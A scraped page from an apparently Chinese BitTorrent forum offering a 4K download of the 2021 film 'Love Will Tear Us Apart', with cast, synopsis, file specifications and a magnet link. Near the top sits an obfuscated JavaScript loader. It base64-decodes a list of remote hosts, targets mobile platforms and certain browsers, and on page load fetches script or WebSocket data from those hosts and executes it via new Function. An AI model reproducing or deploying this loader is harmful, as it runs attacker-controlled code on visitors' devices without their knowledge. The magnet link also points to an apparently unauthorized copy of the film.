我要我们在一起[字幕].Love.Will.Tear.Us.Apart.2021.WEB-DL.4K.HEVC.DDP5.1-迅雷下载 11.85GB

版主小s 2月前 425

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译 名 我要我们在一起 / 10年女友 / 十年女友 / 与我十年长跑的女友明天要嫁人了 / Love Will Tear Us Apart

◎年 代 2021

◎产 地 中国大陆

◎类 别 剧情 / 爱情

◎语 言 汉语普通话

◎上映日期 2021-05-20(中国大陆)

◎IMDb链接 https://www.imdb.com/title/tt14546082/

◎豆瓣评分 6.3/10 (40673人评价)

◎豆瓣链接 https://movie.douban.com/subject/25881778/

◎片 长 105分钟

◎导 演 沙漠 Mo Sha (id:1354136)

◎编 剧 王志勇 Zhiyong Wang (id:1409042)

付丹迪 Dandi Fu (id:1423217)

李海波 Haibo Li (id:1361129)

◎演 员 屈楚萧 Chuxiao Qu (id:1359081)

张婧仪 Jingyi Zhang (id:1407562)

孙宁 Ning Sun (id:1383926)

张垚 Yao Zhang (id:1385827)

李嘉灏 Jiahao Li (id:1424373)

裴魁山 Kuishan Pei (id:1362975)

金靖承 Jingcheng Jin (id:1399720)

金世佳 Shijia Jin (id:1313839)

张子贤 Zixian Zhang (id:1374201)

陈国富 Kuo-fu Chen (id:1075862)

胡璇 Xuan Hu (id:1331183)

彭飞 Fei Peng (id:1404313)

莫文蔚 Karen Mok (id:1018248)

颜人中 Renzhong Yan (id:1457366)

王海涛 Haitao Wang (id:1457458)

廖拟 Ni Liao (id:1363810)

黄育男 Luke Huang (id:1331250)

李丹枫 Danfeng Li (id:1401862)

李智勇 Zhiyong Li (id:1456455)

◎标 签 爱情 / 青春 / 恋爱 / 情侣 / 人生 / 国产片 / 中国大陆 / 青年必看异地良品

◎简 介

你有没有爱过一个人,曾经拼了命,只为和TA在一起。十年前,差生吕钦扬当众告白凌一尧,两人从校园步入社会,为了让她幸福,他不惜以命相搏。然而金钱、房子、婚姻等现实的考验,却将两人越推越远。十年长跑,他们能否还记得曾经刻在心底的约定:我要我们在一起。

电影改编自长帖《与我十年长跑的女友明天要嫁人了》。

  1. General

  2. Unique ID : 217501967019471988561975813406595941735 (0xA3A15AE971FF4334447A0D2ABDDB0567)

  3. Complete name : 我要我们在一起.Love.Will.Tear.Us.Apart.2021.WEB-DL.4K.HEVC.DDP5.1-CHDWEB.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 11.9 GiB

  7. Duration : 1 h 44 min

  8. Overall bit rate : 16.3 Mb/s

  9. Encoded date : UTC 2021-07-02 03:28:21

  10. Writing application : mkvmerge v51.0.0 ('I Wish') 64-bit

  11. Writing library : libebml v1.4.0 + libmatroska v1.6.2


  12. Video

  13. ID : 1

  14. Format : HEVC

  15. Format/Info : High Efficiency Video Coding

  16. Format profile : [email protected]@Main

  17. Codec ID : V_MPEGH/ISO/HEVC

  18. Duration : 1 h 44 min

  19. Bit rate : 16.0 Mb/s

  20. Width : 3 840 pixels

  21. Height : 1 512 pixels

  22. Display aspect ratio : 2.540

  23. Frame rate mode : Constant

  24. Frame rate : 24.000 FPS

  25. Color space : YUV

  26. Chroma subsampling : 4:2:0

  27. Bit depth : 8 bits

  28. Bits/(Pixel*Frame) : 0.115

  29. Stream size : 11.7 GiB (98%)

  30. Default : Yes

  31. Forced : No


  32. Audio

  33. ID : 2

  34. Format : E-AC-3

  35. Format/Info : Enhanced AC-3

  36. Commercial name : Dolby Digital Plus

  37. Codec ID : A_EAC3

  38. Duration : 1 h 44 min

  39. Bit rate mode : Constant

  40. Bit rate : 256 kb/s

  41. Channel(s) : 6 channels

  42. Channel layout : L R C LFE Ls Rs

  43. Sampling rate : 48.0 kHz

  44. Frame rate : 31.250 FPS (1536 SPF)

  45. Compression mode : Lossy

  46. Stream size : 191 MiB (2%)

  47. Service kind : Complete Main

  48. Default : Yes

  49. Forced : No


TAGS 剧情 爱情

磁力链:
  • magnet:?xt=urn:btih:D1021E3497D67B0A2068E711CE0E290FDFABDA23
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回